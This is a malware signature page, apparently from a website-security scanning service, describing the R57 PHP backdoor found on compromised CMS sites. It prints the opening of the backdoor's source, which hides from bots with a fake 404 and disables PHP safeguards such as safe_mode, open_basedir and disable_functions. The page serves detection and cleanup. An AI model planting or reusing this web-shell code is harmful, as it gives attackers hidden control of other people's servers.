SiteCheck Signatures

  1. Home
  2. SiteCheck Signatures
  3. backdoor-phpr5701

backdoor-phpr5701

Description:
We detected the "R57" backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.

Affecting:
Any web site (common on compromised Joomla, osCommerce and WordPress sites)

Clean up:
You can also sign up with us and let our team remove the malware for you.

Malware dump:

<?php 
if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header("HTTP/1.0 404");exit("<h1>Not Found</h1>");}

$language="eng";
$auth = 0;
$name=''; 
$pass='';
//ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8
@setlocale(LC_ALL,'ru_RU.cp1251');

@ini_restore("safe_mode");
@ini_restore("open_basedir");
@ini_restore("safe_mode_include_dir");
@ini_restore("safe_mode_exec_dir");
@ini_restore("disable_functions");
@ini_restore("allow_url_fopen");